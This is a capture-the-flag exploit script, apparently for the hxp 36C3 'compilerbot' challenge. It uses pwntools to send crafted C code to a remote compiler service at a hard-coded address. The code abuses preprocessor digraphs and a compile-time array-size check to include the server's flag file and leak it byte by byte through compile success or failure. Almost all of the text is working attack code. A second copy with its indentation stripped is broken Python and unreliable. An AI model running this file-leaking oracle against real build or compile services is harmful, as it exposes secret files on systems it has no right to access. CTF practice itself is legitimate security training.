kokjo/doit-compilterbot-36c3.py

## doit-compilterbot-36c3.py
from pwn import *
import base64

template = """
%%>

%%:pragma clang diagnostic ignored "-Wunused-local-typedef"
%%:pragma clang diagnostic ignored "-Wunused-variable"
%%:define str(x) %%:x
%%:define hxp str(
typedef char check_t[(
%%:include "flag"
)[%(offset)d] == %(byte)d) ? -1 : 0];
check_t check;
//"""

p_status = log.progress("Status")
p_flag = log.progress("Flag")

flag = ""
while "}" not in flag:
    offset = len(flag)
    for byte in range(32,128):
        r = remote("88.198.154.157", 8011, level="error")
        r.recvuntil("> ")
        code = template % locals()
        r.sendline(b64e(code))
        res = r.recvline().strip()
        r.close()
        if "Not" in res:
            break
        p_status.status("Offset %d Byte %d Response %s" % (offset, byte, res))
    flag += chr(byte)
    p_flag.status(flag)
	from pwn import *
	import base64

	template = """
	%%>

	%%:pragma clang diagnostic ignored "-Wunused-local-typedef"
	%%:pragma clang diagnostic ignored "-Wunused-variable"
	%%:define str(x) %%:x
	%%:define hxp str(
	typedef char check_t[(
	%%:include "flag"
	)[%(offset)d] == %(byte)d) ? -1 : 0];
	check_t check;
	//"""

	p_status = log.progress("Status")
	p_flag = log.progress("Flag")

	flag = ""
	while "}" not in flag:
	offset = len(flag)
	for byte in range(32,128):
	r = remote("88.198.154.157", 8011, level="error")
	r.recvuntil("> ")
	code = template % locals()
	r.sendline(b64e(code))
	res = r.recvline().strip()
	r.close()
	if "Not" in res:
	break
	p_status.status("Offset %d Byte %d Response %s" % (offset, byte, res))
	flag += chr(byte)
	p_flag.status(flag)